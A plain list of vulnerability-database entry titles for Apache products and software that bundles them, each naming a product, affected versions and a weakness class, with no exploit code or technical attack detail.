| [74371] Apache Standard Taglibs up to 1.2.0 memory corruption
| [74367] Apache HTTP Server up to 2.4.12 mod_lua lua_request.c wsupgrade denial of service
| [74174] Apache WSS4J up to 2.0.0 privilege escalation
| [74172] Apache ActiveMQ up to 5.5.0 Administration Console cross site scripting
| [69092] Apache Tomcat up to 6.0.42/7.0.54/8.0.8 HTTP Request Smuggling privilege escalation
| [73831] Apache Qpid up to 0.30 Access Restriction unknown vulnerability
| [73731] Apache XML Security unknown vulnerability
| [68660] Oracle BI Publisher 10.1.3.4.2/11.1.1.7 Apache Tomcat cross site scripting
| [73659] Apache CloudStack up to 4.3.0 Stack-Based unknown vulnerability
| [73593] Apache Traffic Server up to 5.1.0 denial of service
| [73511] Apache POI up to 3.10 Deadlock denial of service
| [73510] Apache Solr up to 4.3.0 cross site scripting
| [68447] Apache Subversion up to 1.7.18/1.8.10 mod_dav_svn Crash denial of service
| [68446] Apache Subversion up to 1.7.18/1.8.10 REPORT Request Crash denial of service
| [73173] Apache CloudStack Stack-Based unknown vulnerability
| [68357] Apache Struts up to 2.3.16.3 Random Number Generator cross site request forgery
| [73106] Apache Hadoop up to 2.4.0 Symlink privilege escalation
| [68575] Apache HTTP Server up to 2.4.10 LuaAuthzProvider mod_lua.c privilege escalation
| [72890] Apache Qpid 0.30 unknown vulnerability
| [72887] Apache Hive 0.13.0 File Permission privilege escalation
| [72878] Apache Cordova 3.5.0 cross site request forgery
| [72877] Apache Cordova 3.5.0 cross site request forgery
| [72876] Apache Cordova 3.5.0 cross site request forgery
| [68435] Apache HTTP Server 2.4.10 mod_proxy_fcgi.c handle_headers denial of service
| [68065] Apache CXF up to 3.0.1 JAX-RS SAML denial of service
| [68064] Apache CXF up to 3.0.0 SAML Token denial of service
| [67913] Oracle Retail Markdown Optimization 12.0/13.0/13.1/13.2/13.4 Apache commons-beanutils-1.8.0.jar memory corruption
| [67912] Oracle Retail Invoice Matching up to 14.0 Apache commons-beanutils-1.8.0.jar memory corruption
| [67911] Oracle Retail Clearance Optimization Engine 13.3/13.4/14.0 Apache commons-beanutils-1.8.0.jar memory corruption
| [67910] Oracle Retail Allocation up to 13.2 Apache commons-beanutils-1.8.0.jar memory corruption
| [71835] Apache Shiro 1.0.0/1.1.0/1.2.0/1.2.1/1.2.2 unknown vulnerability
| [71633] Apachefriends XAMPP 1.8.1 cross site scripting
| [71629] Apache Axis2/C spoofing
| [67633] Apple Mac OS X up to 10.9.4 apache_mod_php ext/standard/dns.c dns_get_record memory corruption
| [67631] Apple Mac OS X up to 10.9.4 apache_mod_php Symlink memory corruption
| [67630] Apple Mac OS X up to 10.9.4 apache_mod_php cdf_read_property_info denial of service
| [67629] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_count_chain denial of service
| [67628] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_check_stream_offset denial of service
| [67627] Apple Mac OS X up to 10.9.4 apache_mod_php softmagic.c mconvert memory corruption
| [67626] Apple Mac OS X up to 10.9.4 apache_mod_php softmagic.c denial of service
| [67625] Apple Mac OS X up to 10.9.4 apache_mod_php Crash denial of service
| [67624] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_read_property_info denial of service
| [67623] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_unpack_summary_info denial of service
| [67622] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_read_short_sector denial of service
| [67620] Apple Mac OS X up to 10.9.4 apache_mod_php magic/Magdir/commands denial of service
| [67790] Apache HTTP Server mod_cache NULL Pointer Dereference denial of service
| [67522] Apache Tomcat up to 7.0.39 JSP Upload privilege escalation
| [70809] Apache POI up to 3.11 Crash denial of service
| [70808] Apache POI up to 3.10 unknown vulnerability
| [70806] Apache Commons-httpclient 4.2/4.2.1/4.2.2 spoofing
| [70749] Apache Axis up to 1.4 getCN spoofing
| [70701] Apache Traffic Server up to 3.3.5 denial of service
| [70700] Apache OFBiz up to 12.04.03 cross site scripting
| [67402] Apache OpenOffice 4.0.0/4.0.1/4.1.0 Calc privilege escalation
| [67401] Apache OpenOffice up to 4.1.0 OLE Object information disclosure
| [70661] Apache Subversion up to 1.6.17 denial of service
| [70660] Apache Subversion up to 1.6.17 spoofing
| [70659] Apache Subversion up to 1.6.17 spoofing
| [67183] Apache HTTP Server up to 2.4.9 mod_proxy denial of service
| [67180] Apache HTTP Server up to 2.4.9 WinNT MPM Memory Leak denial of service
| [67185] Apache HTTP Server up to 2.4.9 mod_status Heap-Based memory corruption
| [67184] Apache HTTP Server 2.4.5/2.4.6 mod_cache NULL Pointer Dereference denial of service
| [67182] Apache HTTP Server up to 2.4.9 mod_deflate Memory Consumption denial of service
| [67181] Apache HTTP Server up to 2.4.9 mod_cgid denial of service
| [70338] Apache Syncope up to 1.1.7 unknown vulnerability
| [70295] Apache CXF up to 2.7.9 Cleartext information disclosure
| [70106] Apache Open For Business Project up to 10.04.0 getServerError cross site scripting
| [70105] Apache MyFaces up to 2.1.5 JavaServer Faces directory traversal
| [69846] Apache HBase up to 0.94.8 information disclosure
| [69783] Apache CouchDB up to 1.2.0 memory corruption
| [13383] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 XML Parser privilege escalation
| [13300] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi setuid privilege escalation
| [13299] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi Content-Type Header information disclosure
| [13164] Apache CXF up to 2.6.13/2.7.10 SOAP OutgoingChainInterceptor.java Invalid Content denial of service
| [13163] Apache CXF up to 2.6.13/2.7.10 SOAP HTML Content denial of service
| [13158] Apache Struts up to 2.3.16.2 ParametersInterceptor getClass privilege escalation
| [69515] Apache Struts up to 2.3.15.0 CookieInterceptor memory corruption
| [13086] Apache Struts up to 1.3.10 Class Loader privilege escalation
| [13067] Apache Struts up to 2.3.16.1 Class Loader privilege escalation
| [69431] Apache Archiva up to 1.3.6 cross site scripting
| [69385] Apache Syncope up to 1.1.6 unknown vulnerability
| [69338] Apache Xalan-Java up to 2.7.1 system-property unknown vulnerability
| [12742] Trustwave ModSecurity up to 2.7.5 Chunk Extension apache2/modsecurity.c modsecurity_tx_init privilege escalation
| [12741] Trustwave ModSecurity up to 2.7.6 Chunked HTTP Transfer apache2/modsecurity.c modsecurity_tx_init Trailing Header privilege escalation
| [13387] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 Content-Length Header privilege escalation
| [13386] Apache Tomcat Security Manager up to 6.0.39/7.0.53/8.0.5 XSLT privilege escalation
| [13385] Apache Tomcat 8.0.0/8.0.1/8.0.3 AJP Request Zero Length denial of service
| [13384] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 Chunked HTTP Request denial of service
| [12748] Apache CouchDB 1.5.0 UUIDS /_uuids denial of service
| [66739] Apache Camel up to 2.12.2 unknown vulnerability
| [66738] Apache Camel up to 2.12.2 unknown vulnerability
| [12667] Apache HTTP Server 2.4.7 mod_log_config.c log_cookie denial of service
| [66695] Apache CouchDB up to 1.2.0 cross site scripting
| [66694] Apache CouchDB up to 1.2.0 Partition partition2 directory traversal
| [66689] Apache HTTP Server up to 2.0.33 mod_dav dav_xml_get_cdata denial of service
| [12518] Apache Tomcat up to 6.0.38/7.0.49/8.0.0-RC9 HTTP Header denial of service
| [66498] Apache expressions up to 3.3.0 Whitelist unknown vulnerability
| [12781] Apache Struts up to 2.3.8 ParametersInterceptor getClass denial of service
| [12439] Apache Tomcat 6.0.33 XML XXE information disclosure
| [12438] Apache Tomcat 6.0.33/6.0.34/6.0.35/6.0.36/6.0.37 coyoteadapter.java disableURLRewriting privilege escalation
| [66356] Apache Wicket up to 6.8.0 information disclosure
| [12209] Apache Tomcat 7.0.0/7.0.50/8.0.0-RC1/8.0.1 Content-Type Header for Multi-Part Request Infinite Loop denial of service
| [66322] Apache ActiveMQ up to 5.8.0 cross site scripting
| [12291] Apache Struts up to 2.2.3 DebuggingInterceptor privilege escalation
| [66255] Apache Open For Business Project up to 10.04.3 cross site scripting
| [66200] Apache Hadoop up to 2.0.5 Security Feature information disclosure
| [66072] Apache CloudStack up to 4.2.0 Stack-Based unknown vulnerability
| [66068] Apache CloudStack up to 4.2.0 Stack-Based unknown vulnerability
| [11928] Oracle Secure Global Desktop up to 4.71 Apache Tomcat unknown vulnerability
| [11924] Oracle Secure Global Desktop up to 4.63 Apache Tomcat denial of service
| [11922] Oracle Secure Global Desktop up to 4.63 Apache Tomcat unknown vulnerability
| [66049] Apache XML Security for Java up to 1.4.6 Memory Consumption denial of service
| [12199] Apache Subversion up to 1.8.5 mod_dav_svn/repos.c get_resource denial of service
| [65946] askapache Firefox Adsense up to 3.0 askapache-firefox-adsense.php cross site request forgery
| [65668] Apache Solr 4.0.0 Updater denial of service
| [65665] Apache Solr up to 4.3.0 denial of service
| [65664] Apache Solr 3.6.0/3.6.1/3.6.2/4.0.0 Updater denial of service
| [65663] Apache Solr up to 4.5.1 ResourceLoader directory traversal
| [65658] Apache roller 4.0/4.0.1/5.0/5.0.1 unknown vulnerability
| [65657] Apache Roller 4.0/4.0.1/5.0/5.0.1 cross site scripting
| [11325] Apache Subversion 1.7.13 mod_dontdothat Bypass denial of service
| [11324] Apache Subversion up to 1.8.4 mod_dav_svn denial of service
| [11098] Apache Tomcat 5.5.25 HTTP Request cross site request forgery
| [65410] Apache Struts 2.3.15.3 cross site scripting
| [65386] Apache Solr up to 2.2.1 on TYPO3 cross site scripting
| [65385] Apache Solr up to 2.2.1 on TYPO3 unknown vulnerability
| [11044] Apache Struts 2.3.15.3 showConfig.action cross site scripting
| [11043] Apache Struts 2.3.15.3 actionNames.action cross site scripting
| [11018] cPanel WHM up to 11.40.0.11 Apache mod_userdir Tweak Interface privilege escalation
| [65342] Apache Sling 1.0.2/1.0.4/1.0.6/1.1.0/1.1.2 Auth Core cross site scripting
| [65340] Apache Shindig 2.5.0 information disclosure
| [65316] Apache Mod Fcgid up to 2.3.7 mod_fcgid fcgid_bucket.c fcgid_header_bucket_read memory corruption
| [65313] Apache Sling 2.2.0/2.3.0 AbstractCreateOperation.java deepGetOrCreateNode denial of service
| [10826] Apache Struts 2 File privilege escalation
| [65204] Apache Camel up to 2.10.1 unknown vulnerability
| [10460] Apache Struts 2.0.0/2.3.15.1 Action Mapping Mechanism Bypass privilege escalation
| [10459] Apache Struts 2.0.0/2.3.15 Dynamic Method Invocation unknown vulnerability
| [10160] Apache Subversion 1.8.0/1.8.1/1.8.2 svnwcsub.py handle_options race condition
| [10159] Apache Subversion up to 1.8.2 svnserve write_pid_file race condition
| [10158] Apache Subversion 1.8.0/1.8.1/1.8.2 daemonize.py daemon::daemonize race condition
| [10157] Apache Subversion up to 1.8.1 FSFS Repository Symlink privilege escalation
| [64808] Fail2ban up to 0.8.9 apache-auth.conf denial of service
| [64760] Best Practical RT up to 4.0.12 Apache::Session::File information disclosure
| [64722] Apache XML Security for C++ Heap-based memory corruption
| [64719] Apache XML Security for C++ Heap-based memory corruption
| [64718] Apache XML Security for C++ verify denial of service
| [64717] Apache XML Security for C++ getURIBaseTXFM memory corruption
| [64716] Apache XML Security for C++ spoofing
| [64701] Apache CXF up to 2.7.3 XML Parser Memory Consumption denial of service
| [64700] Apache CloudStack up to 4.1.0 Stack-Based cross site scripting
| [64667] Apache Open For Business Project up to 10.04.04 unknown vulnerability
| [64666] Apache Open For Business Project up to 10.04.04 cross site scripting
| [9891] Apache HTTP Server 2.2.22 suEXEC Feature .htaccess information disclosure
| [64509] Apache ActiveMQ up to 5.8.0 scheduled.jsp cross site scripting
| [9826] Apache Subversion up to 1.8.0 mod_dav_svn denial of service
| [9683] Apache HTTP Server 2.4.5 mod_session_dbd denial of service
| [64485] Apache Struts up to 2.2.3.0 privilege escalation
| [9568] Apache Struts up to 2.3.15 DefaultActionMapper cross site request forgery
| [9567] Apache Struts up to 2.3.15 DefaultActionMapper memory corruption
| [64467] Apache Geronimo 3.0 memory corruption
| [64466] Apache OpenJPA up to 2.2.1 Serialization memory corruption
| [64457] Apache Struts up to 2.2.3.0 cross site scripting
| [64326] Alejandro Garza Apachesolr Autocomplete up to 7.x-1.1 cross site scripting
| [9184] Apache Qpid up to 0.20 SSL misconfiguration
| [8935] Apache Subversion up to 1.7.9 FSFS Format Repository denial of service
| [8934] Apache Subversion up to 1.7.9 Svnserve Server denial of service
| [8933] Apache Subversion up to 1.6.21 check-mime-type.pl svnlook memory corruption
| [8932] Apache Subversion up to 1.6.21 svn-keyword-check.pl svnlook changed memory corruption
| [9022] Apache Struts up to 2.3.14.2 OGNL Expression memory corruption
| [8873] Apache Struts 2.3.14 privilege escalation
| [8872] Apache Struts 2.3.14 privilege escalation
| [8746] Apache HTTP Server Log File Terminal Escape Sequence Filtering mod_rewrite.c do_rewritelog privilege escalation
| [8666] Apache Tomcat up to 7.0.32 AsyncListener information disclosure
| [8665] Apache Tomcat up to 7.0.29 Chunked Transfer Encoding Extension Size denial of service
| [8664] Apache Tomcat up to 7.0.32 FORM Authentication weak authentication
| [64075] Apache Subversion up to 1.7.7 mod_dav_svn Crash denial of service
| [64074] Apache Subversion up to 1.7.8 mod_dav_svn NULL Pointer Dereference denial of service
| [64073] Apache Subversion up to 1.7.8 mod_dav_svn NULL Pointer Dereference denial of service
| [64072] Apache Subversion up to 1.7.7 mod_dav_svn NULL Pointer Dereference denial of service
| [64071] Apache Subversion up to 1.7.8 mod_dav_svn Memory Consumption denial of service
| [8768] Apache Struts up to 2.3.14 on Mac EL and OGNL Interpreter memory corruption
| [64006] Apache ActiveMQ up to 5.7.0 denial of service
| [64005] Apache ActiveMQ up to 5.7.0 Default Configuration denial of service
| [64004] Apache ActiveMQ up to 5.7.0 PortfolioPublishServlet.java cross site scripting
| [8427] Apache Tomcat Session Transaction weak authentication
| [63960] Apache Maven 3.0.4 Default Configuration spoofing
| [63751] Apache qpid up to 0.20 qpid::framing::Buffer denial of service
| [63750] Apache qpid up to 0.20 checkAvailable denial of service
| [63749] Apache Qpid up to 0.20 Memory Consumption denial of service
| [63748] Apache Qpid up to 0.20 Default Configuration denial of service
| [63747] Apache Rave up to 0.20 User Account information disclosure
| [7889] Apache Subversion up to 1.6.17 mod_dav_svn/svn_fs_file_length() denial of service
| [63646] Apache HTTP Server up to 2.2.23/2.4.3 mod_proxy_balancer.c balancer_handler cross site scripting
| [7688] Apache CXF up to 2.7.1 WSS4JInterceptor Bypass weak authentication
| [7687] Apache CXF up to 2.7.2 Token weak authentication
| [63334] Apache CXF up to 2.6.0 WS-Security unknown vulnerability
| [63299] Apache CXF up to 2.6.0 WS-Security unknown vulnerability
| [7202] Apache HTTP Server 2.4.2 on Oracle Solaris ld_library_path cross site scripting
| [7075] Apache Tomcat up to 6.0.35/7.0.27 NIO Connector NioEndpoint.java denial of service
| [7074] Apache Tomcat up to 6.0.35/7.0.29 FORM Authentication RealmBase.java weak authentication
| [7073] Apache Tomcat up to 6.0.35/7.0.31 CSRF Prevention Filter cross site request forgery
| [63090] Apache Tomcat up to 4.1.24 denial of service
| [63089] Apache HTTP Server up to 2.2.13 mod_proxy_ajp denial of service
| [62933] Apache Tomcat up to 5.5.0 Access Restriction unknown vulnerability
| [62929] Apache Tomcat up to 6.0.35/7.0.27 NIO Connector Memory Consumption denial of service
| [62833] Apache CXF -/2.6.0 spoofing
| [62832] Apache Axis2 up to 1.6.2 spoofing
| [62831] Apache Axis up to 1.4 Java Message Service spoofing
| [62830] Apache Commons-httpclient 3.0 Payments spoofing
| [62826] Apache Libcloud up to 0.11.0 spoofing
| [62757] Apache Open For Business Project up to 10.04.0 unknown vulnerability
| [8830] Red Hat JBoss Enterprise Application Platform 6.0.1 org.apache.catalina.connector.Response.encodeURL information disclosure
| [62661] Apache Axis2 unknown vulnerability
| [62658] Apache Axis2 unknown vulnerability
| [62467] Apache Qpid up to 0.17 denial of service
| [62417] Apache CXF 2.4.7/2.4.8/2.5.3/2.5.4/2.6.1 spoofing
| [6301] Apache HTTP Server mod_pagespeed cross site scripting
| [6300] Apache HTTP Server mod_pagespeed Hostname information disclosure
| [6123] Apache Wicket up to 1.5.7 Ajax Link cross site scripting
| [62035] Apache Struts up to 2.3.4 denial of service
| [61916] Apache QPID 0.5/0.6/0.14/0.16 unknown vulnerability
| [6998] Apache Tomcat 5.5.35/6.0.35/7.0.28 DIGEST Authentication Session State Caching privilege escalation
| [6997] Apache Tomcat 5.5.35/6.0.35/7.0.28 HTTP Digest Authentication Implementation privilege escalation
| [6092] Apache HTTP Server 2.4.0/2.4.1/2.4.2 mod_proxy_ajp.c information disclosure
| [6090] Apache HTTP Server 2.4.0/2.4.1/2.4.2 mod_proxy_http.c information disclosure
| [61507] Apache POI up to 3.8 UnhandledDataStructure denial of service
| [6070] Apache Struts up to 2.3.4 Token Name Configuration Parameter privilege escalation
| [6069] Apache Struts up to 2.3.4 Request Parameter OGNL Expression denial of service
| [5764] Oracle Solaris 10 Apache HTTP Server information disclosure
| [5700] Oracle Secure Backup 10.3.0.3/10.4.0.1 Apache denial of service
| [61255] Apache Hadoop 2.0.0 Kerberos unknown vulnerability
| [61229] Apache Sling up to 2.1.1 denial of service
| [61152] Apache Commons-compress 1.0/1.1/1.2/1.3/1.4 denial of service
| [61094] Apache Roller up to 5.0 cross site scripting
| [61093] Apache Roller up to 5.0 cross site request forgery
| [61005] Apache OpenOffice 3.3/3.4 unknown vulnerability
| [9673] Apache HTTP Server up to 2.4.4 mod_dav mod_dav.c Request denial of service
| [5436] Apache OpenOffice 3.3/3.4 WPXContentListener.cpp _closeTableRow File memory corruption
| [5435] Apache OpenOffice 3.3/3.4 vclmi.dll File memory corruption
| [60730] PHP 5.4.0/5.4.1/5.4.2 apache_request_headers memory corruption
| [60708] Apache Qpid 0.12 unknown vulnerability
| [5032] Apache Hadoop up to 0.20.205.0/1.0.1/0.23.1 Kerberos/MapReduce Security Feature privilege escalation
| [4949] Apache Struts File Upload XSLTResult.java XSLT File privilege escalation
| [4955] Apache Traffic Server 3.0.3/3.1.2 HTTP Header Parser memory corruption
| [4882] Apache Wicket up to 1.5.4 directory traversal
| [4881] Apache Wicket up to 1.4.19 cross site scripting
| [4884] Apache HTTP Server up to 2.3.6 mod_fcgid fcgid_spawn_ctl.c FcgidMaxProcessesPerClass HTTP Requests denial of service
| [60352] Apache Struts up to 2.2.3 memory corruption
| [60153] Apache Portable Runtime up to 1.4.3 denial of service
| [4598] Apache Struts 1.3.10 upload-submit.do cross site scripting
| [4597] Apache Struts 1.3.10 processSimple.do cross site scripting
| [4596] Apache Struts 2.0.14/2.2.3 struts2-rest-showcase/orders cross site scripting
| [4595] Apache Struts 2.0.14/2.2.3 struts2-showcase/person/editPerson.action cross site scripting
| [4583] Apache HTTP Server up to 2.2.21 Threaded MPM denial of service
| [4582] Apache HTTP Server up to 2.2.21 protocol.c information disclosure
| [4571] Apache Struts up to 2.3.1.2 privilege escalation
| [4557] Apache Tomcat up to 7.0.21 Caching/Recycling information disclosure
| [59934] Apache Tomcat up to 6.0.9 DigestAuthenticator.java unknown vulnerability
| [59933] Apache Tomcat up to 6.0.9 Access Restriction unknown vulnerability
| [59932] Apache Tomcat up to 6.0.9 unknown vulnerability
| [59931] Apache Tomcat up to 6.0.9 Access Restriction information disclosure
| [59902] Apache Struts up to 2.2.3 Interfaces unknown vulnerability
| [4528] Apache Struts up to 2.2.3 DebuggingInterceptor privilege escalation
| [4527] Apache Struts up to 2.2.3 ExceptionDelegator cross site scripting
| [59888] Apache Tomcat up to 6.0.6 denial of service
| [59886] Apache ActiveMQ up to 5.5.1 Crash denial of service
| [4513] Apache Struts up to 2.3.1 ParameterInterceptor directory traversal
| [4512] Apache Struts up to 2.2.3 CookieInterceptor privilege escalation
| [59850] Apache Geronimo up to 2.2.1 denial of service
| [59825] Apache HTTP Server up to 2.1.7 mod_reqtimeout denial of service
| [59556] Apache HTTP Server up to 2.0.53 mod_proxy information disclosure
| [58467] Apache libcloud 0.2.0/0.3.0/0.3.1/0.4.0 Access Restriction spoofing
| [58413] Apache Tomcat up to 6.0.10 spoofing
| [58381] Apache Wicket up to 1.4.17 cross site scripting
| [58296] Apache Tomcat up to 7.0.19 unknown vulnerability
| [57888] Apache HttpClient 4.0/4.0.1/4.1 Authorization information disclosure
| [57587] Apache Subversion up to 1.6.16 mod_dav_svn information disclosure
| [57585] Apache Subversion up to 1.6.16 mod_dav_svn Memory Consumption denial of service
| [57584] Apache Subversion up to 1.6.4 mod_dav_svn NULL Pointer Dereference denial of service
| [57577] Apache Rampart-C 1.3.0 Access Restriction rampart_timestamp_token_validate privilege escalation
| [57568] Apache Archiva up to 1.3.4 cross site scripting
| [57567] Apache Archiva up to 1.3.4 cross site request forgery
| [57481] Apache Tomcat 7.0.12/7.0.13 Access Restriction unknown vulnerability
| [4355] Apache HTTP Server APR apr_fnmatch denial of service
| [57435] Apache Struts up to 2.2.1.1 FileHandler.java cross site scripting
| [57425] Apache Struts up to 2.2.1.1 cross site scripting
| [4352] Apache HTTP Server 2.2.x APR apr_fnmatch denial of service
| [57025] Apache Tomcat up to 7.0.11 information disclosure
| [57024] Apache Tomcat 7.0.11 Access Restriction information disclosure
| [56774] IBM WebSphere Application Server up to 7.0.0.14 org.apache.jasper.runtime.JspWriterImpl.response denial of service
| [56824] Apache Subversion up to 1.6.4 mod_dav_svn NULL Pointer Dereference denial of service
| [56832] Apache Tomcat up to 7.0.10 Access Restriction information disclosure
| [56830] Apache Tomcat up to 7.0.9 Access Restriction privilege escalation
| [12440] Apache Tomcat 6.0.33 Malicious Request cross site scripting
| [56512] Apache Continuum up to 1.4.0 cross site scripting
| [4285] Apache Tomcat 5.x JVM getLocale denial of service
| [4284] Apache Tomcat 5.x HTML Manager Infinite Loop cross site scripting
| [4283] Apache Tomcat 5.x ServletContect privilege escalation
| [56441] Apache Tomcat up to 7.0.6 denial of service
| [56300] Apache CouchDB up to 1.0.1 Web Administration Interface cross site scripting
| [55967] Apache Subversion up to 1.6.4 rev_hunt.c denial of service
| [55966] Apache Subversion up to 1.6.4 mod_dav_svn repos.c walk denial of service
| [55095] Apache Axis2 up to 1.6 Default Password memory corruption
| [55631] Apache Archiva up to 1.3.1 User Account cross site request forgery
| [55556] Apache Tomcat up to 6.0.29 Default Configuration information disclosure
| [55553] Apache Tomcat up to 7.0.4 sessionsList.jsp cross site scripting
| [55162] Apache MyFaces up to 2.0.0 Authentication Code unknown vulnerability
| [54881] Apache Subversion up to 1.6.12 mod_dav_svn authz.c privilege escalation
| [54879] Apache APR-util up to 0.9.14 mod_reqtimeout apr_brigade_split_line denial of service
| [54693] Apache Traffic Server DNS Cache unknown vulnerability
| [54416] Apache CouchDB up to 0.11.0 cross site request forgery
| [54394] Apache CXF up to 2.2.8 Memory Consumption denial of service
| [54261] Apache Tomcat jsp/cal/cal2.jsp cross site scripting
| [54166] Apache HTTP Server up to 2.2.12 mod_cache Crash denial of service
| [54385] Apache Struts up to 2.1.8.1 ParameterInterceptor unknown vulnerability
| [54012] Apache Tomcat up to 6.0.10 denial of service
| [53763] Apache Axis2 1.3/1.4/1.4.1/1.5/1.5.1 Memory Consumption denial of service
| [53368] Apache MyFaces 1.1.7/1.2.8 cross site scripting
| [53397] Apache axis2 1.4.1/1.5.1 Administration Console cross site scripting
| [52894] Apache Tomcat up to 6.0.7 information disclosure
| [52960] Apache ActiveMQ up to 5.4-snapshot information disclosure
| [52843] Apache HTTP Server mod_auth_shadow unknown vulnerability
| [52786] Apache Open For Business Project up to 09.04 cross site scripting
| [52587] Apache ActiveMQ up to 5.3.0 cross site request forgery
| [52586] Apache ActiveMQ up to 5.3.0 cross site scripting
| [52584] Apache CouchDB up to 0.10.1 information disclosure
| [51757] Apache HTTP Server 2.0.44 cross site scripting
| [51756] Apache HTTP Server 2.0.44 spoofing
| [51717] Apache HTTP Server up to 1.3.3 mod_proxy ap_proxy_send_fb memory corruption
| [51690] Apache Tomcat up to 6.0 directory traversal
| [51689] Apache Tomcat up to 6.0 information disclosure
| [51688] Apache Tomcat up to 6.0 directory traversal
| [50886] HP Operations Manager 8.10 on Windows File Upload org.apache.catalina.manager.HTMLManagerServlet memory corruption
| [50802] Apache Tomcat up to 3.3 Default Password weak authentication
| [50626] Apache Solr 1.0.0 cross site scripting
| [49857] Apache HTTP Server mod_proxy_ftp cross site scripting
| [49856] Apache HTTP Server 2.2.13 mod_proxy_ftp ap_proxy_ftp_handler denial of service
| [49348] Apache Xerces-C++ 2.7.0 Stack-Based denial of service
| [86789] Apache Portable Runtime memory/unix/apr_pools.c unknown vulnerability
| [49283] Apache APR-util up to 1.3.8 apr-util misc/apr_rmm.c apr_rmm_realloc memory corruption
| [48952] Apache HTTP Server up to 1.3.6 mod_deflate denial of service
| [48626] Apache Tomcat up to 4.1.23 Access Restriction directory traversal
| [48431] Apache Tomcat up to 4.1.23 j_security_check cross site scripting
| [48430] Apache Tomcat up to 4.1.23 mod_jk denial of service
| [47801] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console cross site request forgery
| [47800] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console cross site scripting
| [47799] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console directory traversal
| [47648] Apache Tiles 2.1.0/2.1.1 cross site scripting
| [47640] Apache Struts 2.0.6/2.0.8/2.0.9/2.0.11/2.1 cross site scripting
| [47638] Apache Tomcat up to 4.1.23 mod_jk information disclosure
| [47636] Apache Struts 2.0.9 xip_client.html cross site scripting
| [47593] Apache Mod Perl 1 perl-status Apache::Status cross site scripting
| [47637] Apache Struts 1.0.2/1.1/1.2.4/1.2.7/1.2.8 cross site scripting
| [47239] Apache Struts up to 2.1.2 Beta struts directory traversal
| [47214] Apachefriends xampp 1.6.8 spoofing
| [47213] Apachefriends xampp 1.6.8 htaccess cross site request forgery
| [47162] Apachefriends XAMPP 1.4.4 weak authentication
| [47065] Apache Tomcat 4.1.23 cross site scripting
4641| [46834] Apache Tomcat up to 5.5.20 cross site scripting
4642| [46004] Apache Jackrabbit 1.4/1.5.0 search.jsp cross site scripting
4643| [49205] Apache Roller 2.3/3.0/3.1/4.0 Search cross site scripting
4644| [86625] Apache Struts directory traversal
4645| [44461] Apache Tomcat up to 5.5.0 information disclosure
4646| [44389] Apache Xerces-C++ XML Parser Memory Consumption denial of service
4647| [44352] Apache Friends XAMPP 1.6.8 adodb.php cross site scripting
4648| [43663] Apache Tomcat up to 6.0.16 directory traversal
4649| [43612] Apache Friends XAMPP 1.6.7 iart.php cross site scripting
4650| [43556] Apache HTTP Server up to 2.1.8 mod_proxy_ftp proxy_ftp.c cross site scripting
4651| [43516] Apache Tomcat up to 4.1.20 directory traversal
4652| [43509] Apache Tomcat up to 6.0.13 cross site scripting
4653| [42637] Apache Tomcat up to 6.0.16 cross site scripting
4654| [42325] Apache HTTP Server up to 2.1.8 Error Page cross site scripting
4655| [41838] Apache-SSL 1.3.34 1.57 expandcert privilege escalation
4656| [41091] Apache Software Foundation Mod Jk up to 2.0.1 mod_jk2 Stack-based memory corruption
4657| [40924] Apache Tomcat up to 6.0.15 information disclosure
4658| [40923] Apache Tomcat up to 6.0.15 unknown vulnerability
4659| [40922] Apache Tomcat up to 6.0 information disclosure
4660| [40710] Apache HTTP Server up to 2.0.61 mod_negotiation cross site scripting
4661| [40709] Apache HTTP Server up to 2.0.53 mod_negotiation cross site scripting
4662| [40656] Apache Tomcat 5.5.20 information disclosure
4663| [40503] Apache HTTP Server mod_proxy_ftp cross site scripting
4664| [40502] Apache HTTP Server up to 2.2.5 mod_proxy_balancer memory corruption
4665| [40501] Apache HTTP Server 2.2.6 mod_proxy_balancer cross site request forgery
4666| [40398] Apache HTTP Server up to 2.2 mod_proxy_balancer cross site scripting
4667| [40397] Apache HTTP Server up to 2.2 mod_proxy_balancer balancer_handler denial of service
4668| [40234] Apache Tomcat up to 6.0.15 directory traversal
4669| [40221] Apache HTTP Server 2.2.6 information disclosure
4670| [40027] David Castro Apache Authcas 0.4 sql injection
4671| [3495] Apache OpenOffice up to 2.3 Database Document Processor unknown vulnerability
4672| [3489] Apache HTTP Server 2.x HTTP Header cross site scripting
4673| [3414] Apache Tomcat WebDAV Stored privilege escalation
4674| [39489] Apache Jakarta Slide up to 2.1 directory traversal
4675| [39540] Apache Geronimo 2.0/2.0.1/2.0.2/2.1 unknown vulnerability
4676| [3310] Apache OpenOffice 1.1.3/2.0.4/2.2.1 TIFF Image Parser Heap-based memory corruption
4677| [38768] Apache HTTP Server up to 2.1.7 mod_autoindex.c cross site scripting
4678| [38952] Apache Geronimo 2.0.1/2.1 unknown vulnerability
4679| [38658] Apache Tomcat 4.1.31 cal2.jsp cross site request forgery
4680| [38524] Apache Geronimo 2.0 unknown vulnerability
4681| [3256] Apache Tomcat up to 6.0.13 cross site scripting
4682| [38331] Apache Tomcat 4.1.24 information disclosure
4683| [38330] Apache Tomcat 4.1.24 information disclosure
4684| [38185] Apache Tomcat 3.3/3.3.1/3.3.1a/3.3.2 Error Message CookieExample cross site scripting
4685| [37967] Apache Tomcat up to 4.1.36 Error Message sendmail.jsp cross site scripting
4686| [37647] Apache Derby 10.1.1.0/10.1.2.1/10.1.3.1 Authorization unknown vulnerability
4687| [37646] Apache Derby 10.1.1.0/10.1.2.1/10.1.3.1 unknown vulnerability
4688| [3141] Apache Tomcat up to 4.1.31 Accept-Language Header cross site scripting
4689| [3133] Apache Tomcat up to 6.0 HTTP cross site scripting
4690| [37292] Apache Tomcat up to 5.5.1 cross site scripting
4691| [3130] Apache OpenOffice 2.2.1 RTF Document Heap-based memory corruption
4692| [36981] Apache Tomcat JK Web Server Connector up to 1.2.22 mod_jk directory traversal
